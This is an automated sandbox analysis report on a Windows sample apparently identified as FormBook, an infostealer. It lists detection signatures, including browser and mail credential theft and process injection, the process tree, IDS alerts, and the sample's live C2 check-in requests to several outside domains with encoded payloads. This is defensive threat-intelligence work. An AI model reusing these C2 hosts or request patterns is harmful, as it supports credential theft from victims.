Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ZcshRk2lgh.exe

Overview

General Information

Sample name:ZcshRk2lgh.exe
renamed because original name is a hash value
Original sample name:29f5edb28740dda7118ed53f1432f02bb5a7f809075efb5d89f90016d0eedd00.exe
Analysis ID:1588751
MD5:8c6e69b99c8595bef72154984c028ade
SHA1:7f63a739e91dab69a4c3f45f3a75f6e0b0cf7b81
SHA256:29f5edb28740dda7118ed53f1432f02bb5a7f809075efb5d89f90016d0eedd00
Tags:exeFormbookuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • ZcshRk2lgh.exe (PID: 6340 cmdline: "C:\Users\user\Desktop\ZcshRk2lgh.exe" MD5: 8C6E69B99C8595BEF72154984C028ADE)
    • ZcshRk2lgh.exe (PID: 6828 cmdline: "C:\Users\user\Desktop\ZcshRk2lgh.exe" MD5: 8C6E69B99C8595BEF72154984C028ADE)
      • EbjRcLZjak.exe (PID: 5196 cmdline: "C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • regini.exe (PID: 1732 cmdline: "C:\Windows\SysWOW64\regini.exe" MD5: C99C3BB423097FCF4990539FC1ED60E3)
          • EbjRcLZjak.exe (PID: 360 cmdline: "C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 2860 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000E.00000002.3098541538.0000000005390000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000D.00000002.3092740310.0000000002E30000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000B.00000002.1631865087.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        0000000B.00000002.1633443827.0000000001410000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          0000000D.00000002.3092128109.0000000000910000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            11.2.ZcshRk2lgh.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              11.2.ZcshRk2lgh.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-11T05:10:14.069277+010028554651A Network Trojan was detected192.168.2.74997474.48.143.8280TCP
                2025-01-11T05:10:37.532611+010028554651A Network Trojan was detected192.168.2.74997998.124.224.1780TCP
                2025-01-11T05:10:51.383858+010028554651A Network Trojan was detected192.168.2.749984103.21.221.480TCP
                2025-01-11T05:11:05.088776+010028554651A Network Trojan was detected192.168.2.749988154.23.184.9580TCP
                2025-01-11T05:11:18.533489+010028554651A Network Trojan was detected192.168.2.74999288.198.8.15080TCP
                2025-01-11T05:11:31.785036+010028554651A Network Trojan was detected192.168.2.749996104.21.15.10080TCP
                2025-01-11T05:11:45.286570+010028554651A Network Trojan was detected192.168.2.75000046.253.5.22180TCP
                2025-01-11T05:11:59.210138+010028554651A Network Trojan was detected192.168.2.750004107.167.84.4280TCP
                2025-01-11T05:12:12.676593+010028554651A Network Trojan was detected192.168.2.750008209.74.77.10980TCP
                2025-01-11T05:12:26.928061+010028554651A Network Trojan was detected192.168.2.750013199.59.243.22880TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-11T05:10:29.897373+010028554641A Network Trojan was detected192.168.2.74997698.124.224.1780TCP
                2025-01-11T05:10:32.450166+010028554641A Network Trojan was detected192.168.2.74997798.124.224.1780TCP
                2025-01-11T05:10:34.983992+010028554641A Network Trojan was detected192.168.2.74997898.124.224.1780TCP
                2025-01-11T05:10:43.716647+010028554641A Network Trojan was detected192.168.2.749981103.21.221.480TCP
                2025-01-11T05:10:46.260735+010028554641A Network Trojan was detected192.168.2.749982103.21.221.480TCP
                2025-01-11T05:10:48.816291+010028554641A Network Trojan was detected192.168.2.749983103.21.221.480TCP
                2025-01-11T05:10:57.436120+010028554641A Network Trojan was detected192.168.2.749985154.23.184.9580TCP
                2025-01-11T05:11:00.002724+010028554641A Network Trojan was detected192.168.2.749986154.23.184.9580TCP
                2025-01-11T05:11:02.537339+010028554641A Network Trojan was detected192.168.2.749987154.23.184.9580TCP
                2025-01-11T05:11:10.843783+010028554641A Network Trojan was detected192.168.2.74998988.198.8.15080TCP
                2025-01-11T05:11:13.427684+010028554641A Network Trojan was detected192.168.2.74999088.198.8.15080TCP
                2025-01-11T05:11:16.124460+010028554641A Network Trojan was detected192.168.2.74999188.198.8.15080TCP
                2025-01-11T05:11:24.157966+010028554641A Network Trojan was detected192.168.2.749993104.21.15.10080TCP
                2025-01-11T05:11:27.654504+010028554641A Network Trojan was detected192.168.2.749994104.21.15.10080TCP
                2025-01-11T05:11:29.288730+010028554641A Network Trojan was detected192.168.2.749995104.21.15.10080TCP
                2025-01-11T05:11:37.668381+010028554641A Network Trojan was detected192.168.2.74999746.253.5.22180TCP
                2025-01-11T05:11:40.201873+010028554641A Network Trojan was detected192.168.2.74999846.253.5.22180TCP
                2025-01-11T05:11:42.759533+010028554641A Network Trojan was detected192.168.2.74999946.253.5.22180TCP
                2025-01-11T05:11:51.567566+010028554641A Network Trojan was detected192.168.2.750001107.167.84.4280TCP
                2025-01-11T05:11:54.116612+010028554641A Network Trojan was detected192.168.2.750002107.167.84.4280TCP
                2025-01-11T05:11:56.683958+010028554641A Network Trojan was detected192.168.2.750003107.167.84.4280TCP
                2025-01-11T05:12:04.843633+010028554641A Network Trojan was detected192.168.2.750005209.74.77.10980TCP
                2025-01-11T05:12:07.376635+010028554641A Network Trojan was detected192.168.2.750006209.74.77.10980TCP
                2025-01-11T05:12:10.245023+010028554641A Network Trojan was detected192.168.2.750007209.74.77.10980TCP
                2025-01-11T05:12:18.242281+010028554641A Network Trojan was detected192.168.2.750009199.59.243.22880TCP
                2025-01-11T05:12:20.814141+010028554641A Network Trojan was detected192.168.2.750010199.59.243.22880TCP
                2025-01-11T05:12:23.362257+010028554641A Network Trojan was detected192.168.2.750011199.59.243.22880TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: https://www.cssa.auction/rjvg/?-Jkp4f=tUIUitDW424aYZRkIy55Xux7UvfAvira URL Cloud: Label: malware
                Source: http://www.cssa.auction/rjvg/?-Jkp4f=tUIUitDW424aYZRkIy55Xux7Uvf+CrCOh50QiitLwMhiL+1Z2tzWQWdXN3cz0curJDRK3/q9o39SyPNuZ2Q6LhCYnHJ/8h69BUffqagUGfmBx7ZXwKHkm00gzzb3+tPgf2IZ1KdDH/EL&SVjx=u6ApldVh4TiTWlAvira URL Cloud: Label: malware
                Source: http://www.cssa.auction/rjvg/Avira URL Cloud: Label: malware
                Multi AV Scanner detection for submitted file
                Source: ZcshRk2lgh.exeReversingLabs: Detection: 63%
                Source: ZcshRk2lgh.exeVirustotal: Detection: 71%Perma Link
                Yara detected FormBook
                Source: Yara matchFile source: 11.2.ZcshRk2lgh.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.ZcshRk2lgh.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.3098541538.0000000005390000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.3092740310.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1631865087.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1633443827.0000000001410000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.3092128109.0000000000910000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.3092558737.0000000000DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3095243481.0000000004DA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1634959361.00000000036C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: ZcshRk2lgh.exeJoe Sandbox ML: detected
                Source: ZcshRk2lgh.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: ZcshRk2lgh.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: EbjRcLZjak.exe, 0000000C.00000000.1551853417.0000000000A1E000.00000002.00000001.01000000.0000000D.sdmp, EbjRcLZjak.exe, 0000000E.00000002.3092131327.0000000000A1E000.00000002.00000001.01000000.0000000D.sdmp
                Source: Binary string: wntdll.pdbUGP source: ZcshRk2lgh.exe, 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 0000000D.00000003.1639130757.00000000030ED000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 0000000D.00000003.1641179587.000000000329A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: ZcshRk2lgh.exe, ZcshRk2lgh.exe, 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, regini.exe, regini.exe, 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 0000000D.00000003.1639130757.00000000030ED000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 0000000D.00000003.1641179587.000000000329A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: regini.pdbGCTL source: ZcshRk2lgh.exe, 0000000B.00000002.1633300230.0000000000F47000.00000004.00000020.00020000.00000000.sdmp, EbjRcLZjak.exe, 0000000C.00000002.3094328728.00000000013B8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: regini.pdb source: ZcshRk2lgh.exe, 0000000B.00000002.1633300230.0000000000F47000.00000004.00000020.00020000.00000000.sdmp, EbjRcLZjak.exe, 0000000C.00000002.3094328728.00000000013B8000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0092C8D0 FindFirstFileW,FindNextFileW,FindClose,13_2_0092C8D0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 4x nop then xor eax, eax13_2_00919E40
                Source: C:\Windows\SysWOW64\regini.exeCode function: 4x nop then mov ebx, 00000004h13_2_032704D8

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49984 -> 103.21.221.4:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49976 -> 98.124.224.17:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49998 -> 46.253.5.221:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49983 -> 103.21.221.4:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49997 -> 46.253.5.221:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49974 -> 74.48.143.82:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:50000 -> 46.253.5.221:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49981 -> 103.21.221.4:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49991 -> 88.198.8.150:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49982 -> 103.21.221.4:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:50008 -> 209.74.77.109:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:50004 -> 107.167.84.42:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50010 -> 199.59.243.228:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49979 -> 98.124.224.17:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49988 -> 154.23.184.95:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50003 -> 107.167.84.42:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49978 -> 98.124.224.17:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50002 -> 107.167.84.42:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49987 -> 154.23.184.95:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49989 -> 88.198.8.150:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49985 -> 154.23.184.95:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49992 -> 88.198.8.150:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49977 -> 98.124.224.17:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50007 -> 209.74.77.109:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50001 -> 107.167.84.42:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50009 -> 199.59.243.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49995 -> 104.21.15.100:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49994 -> 104.21.15.100:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49996 -> 104.21.15.100:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50006 -> 209.74.77.109:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49990 -> 88.198.8.150:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49993 -> 104.21.15.100:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50005 -> 209.74.77.109:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49986 -> 154.23.184.95:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49999 -> 46.253.5.221:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50011 -> 199.59.243.228:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:50013 -> 199.59.243.228:80
                Source: Joe Sandbox ViewIP Address: 103.21.221.4 103.21.221.4
                Source: Joe Sandbox ViewASN Name: LINKNET-ID-APLinknetASNID LINKNET-ID-APLinknetASNID
                Source: Joe Sandbox ViewASN Name: BTEL-BG-ASBG BTEL-BG-ASBG
                Source: Joe Sandbox ViewASN Name: MULTIBAND-NEWHOPEUS MULTIBAND-NEWHOPEUS
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /p8wp/?SVjx=u6ApldVh4TiTWl&-Jkp4f=XBEmzwHL3IPy9fzNy+mt0a1h64egiA/nosfb/2OhlZZwotDgHxcXOtzA1prhF0ec+MC5UU6vEfUJUDhxTQZrgjhE6i9RZbIooo4nNVZMxCeQfnPSfF8xtI64tEPJw4kQE2O0gU/hSVG6 HTTP/1.1Host: www.bpgroup.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                Source: global trafficHTTP traffic detected: GET /47f1/?-Jkp4f=BO3MRbup7BgeiGzbrkvG8KshvKs5D/C7iISXRLSPWIyfeIsyuuk5G38k05LUc3hMRb3xwauQUaAEJYhYNzVT7FZPnmIkgRyT2IIjZ1tDFAd1kYY85WNZHG4rc4iGu4bn6UDT+t8IWznL&SVjx=u6ApldVh4TiTWl HTTP/1.1Host: www.bookingservice.centerAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                Source: global trafficHTTP traffic detected: GET /4iun/?-Jkp4f=WRIrWbi0RdvATvg+JEodCsmxHRk8nC/+xgGLR7bozazeHzvdprVUl2vczsb3bYqlYyiGziBj+UW2kzFAiywppdeeEuZCatrMvKH/wfqUumWqZ/cxrFwfzjD9bIbXwkyXSm2rk8ZQ8OQa&SVjx=u6ApldVh4TiTWl HTTP/1.1Host: www.tempatmudisini06.clickAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                Source: global trafficHTTP traffic detected: GET /lazq/?-Jkp4f=WtUPWIBoeWip1ayhwxY4grkqBqE3elVyJELTKTyKd72UqlXqOtyJmls3NLQwFRx/IHhzkpCNBmP7jtEA+bMkSSnofUD+98uCWUF0f78bF04x35xFQJCgARn3b4pm0JSfuygzEuRCwX70&SVjx=u6ApldVh4TiTWl HTTP/1.1Host: www.hm35s.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                Source: global trafficHTTP traffic detected: GET /2lci/?SVjx=u6ApldVh4TiTWl&-Jkp4f=lWB23sttXuwU7VKah9TQdWzGmdySIZI8VeHdcV4a5pKuSPzOO09MVK+LpGEounTDi5Cb1FGE36E3AeLK+XZDKFSbRcaZ2/tMcmtbbzmofvFf8wLCxrzsSN20Y6kXBwn9DafM4OtR1q/N HTTP/1.1Host: www.snehasfashion.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                Source: global trafficHTTP traffic detected: GET /s7xt/?-Jkp4f=KIYGkFEpkLb5U9Z0/G2nYgR5FDZ6UiRQBMLs0+U/kh62mYb3aiLe2OdUmDxpEW63W2KDnmcIAZHjnyCR3mqA6U5k7peC8KRmsRBR08PWB1at1OCwwLT81ahb8amXGnyuxVS1phW32kmk&SVjx=u6ApldVh4TiTWl HTTP/1.1Host: www.sitioseguro.blogAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                Source: global trafficHTTP traffic detected: GET /gybb/?-Jkp4f=hA00v1ZIgX8EW+F3rWYc/zQviV8zTY6oC8gLC3V041/hGU+ZZxjILTR8UNm+bxrYgj9XtAZ4lfteOYOwyHEO/PgAZiplqYTotaLlxgtEc2zUWGdFSG0ILTc8yK+SY1eYqYdzLV7iMcxS&SVjx=u6ApldVh4TiTWl HTTP/1.1Host: www.windsky.clickAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                Source: global trafficHTTP traffic detected: GET /rjvg/?-Jkp4f=tUIUitDW424aYZRkIy55Xux7Uvf+CrCOh50QiitLwMhiL+1Z2tzWQWdXN3cz0curJDRK3/q9o39SyPNuZ2Q6LhCYnHJ/8h69BUffqagUGfmBx7ZXwKHkm00gzzb3+tPgf2IZ1KdDH/EL&SVjx=u6ApldVh4TiTWl HTTP/1.1Host: www.cssa.auctionAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                Source: global trafficHTTP traffic detected: GET /4r26/?SVjx=u6ApldVh4TiTWl&-Jkp4f=6Nu0rwDBxqyxMqkAEP2GSfhicAip3HxzZXQ7XTYJGNWQuHKPGXYdStA7Or1ZV5iEeiylzT/9sq3lky3p7a80ZqplMgmPVg/XIvRa/yHQo/zEfdJf4ghlIiV10Ap+CPKwkexekqfqMwY1 HTTP/1.1Host: www.moviebuff.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                Source: global trafficHTTP traffic detected: GET /rfcw/?-Jkp4f=1DVwkKEghiueIfFcCwDsNrzmsV0jlWV9KBxp6ijGOBnNtam7Kh7d0pIUvfGZjxRQl5JhLEpebxocieWLqaLg78l2CxgzVsRmsJfD+Nxr9z3yLKNaYWJKA3Al29U6v4dT7qNW9rMO1nzu&SVjx=u6ApldVh4TiTWl HTTP/1.1Host: www.whisperart.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                Source: global trafficDNS traffic detected: DNS query: www.bpgroup.site
                Source: global trafficDNS traffic detected: DNS query: www.bookingservice.center
                Source: global trafficDNS traffic detected: DNS query: www.tempatmudisini06.click
                Source: global trafficDNS traffic detected: DNS query: www.hm35s.top
                Source: global trafficDNS traffic detected: DNS query: www.snehasfashion.shop
                Source: global trafficDNS traffic detected: DNS query: www.sitioseguro.blog
                Source: global trafficDNS traffic detected: DNS query: www.windsky.click
                Source: global trafficDNS traffic detected: DNS query: www.cssa.auction
                Source: global trafficDNS traffic detected: DNS query: www.moviebuff.info
                Source: global trafficDNS traffic detected: DNS query: www.whisperart.net
                Source: unknownHTTP traffic detected: POST /47f1/ HTTP/1.1Host: www.bookingservice.centerAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Origin: http://www.bookingservice.centerContent-Length: 219Content-Type: application/x-www-form-urlencodedCache-Control: no-cacheConnection: closeReferer: http://www.bookingservice.center/47f1/User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0Data Raw: 2d 4a 6b 70 34 66 3d 4d 4d 66 73 53 74 61 41 77 79 31 44 69 58 54 53 6b 47 53 56 33 75 67 4f 72 2f 70 6f 47 4c 43 6f 79 76 75 56 53 71 48 55 48 35 4b 6e 52 59 34 4a 39 76 63 35 43 30 67 67 6f 34 50 77 58 58 78 2f 51 2f 2f 41 37 36 48 42 4d 66 56 68 47 70 45 30 44 43 74 31 35 56 49 49 73 48 59 38 2f 51 53 77 2b 4a 4d 52 5a 30 78 63 4f 43 56 63 6d 70 63 72 39 6b 39 43 44 55 45 66 63 6f 61 39 6c 59 57 50 78 58 6a 51 7a 36 31 64 54 69 57 73 69 57 2f 31 4a 74 48 73 72 64 73 44 71 56 42 64 77 4b 6d 44 58 5a 49 74 44 71 59 43 7a 77 64 52 76 41 55 51 6b 63 54 35 42 30 36 6a 66 59 67 45 52 45 59 42 44 6f 79 32 31 63 4b 53 37 6f 48 72 6e 2f 2b 58 34 67 3d 3d Data Ascii: 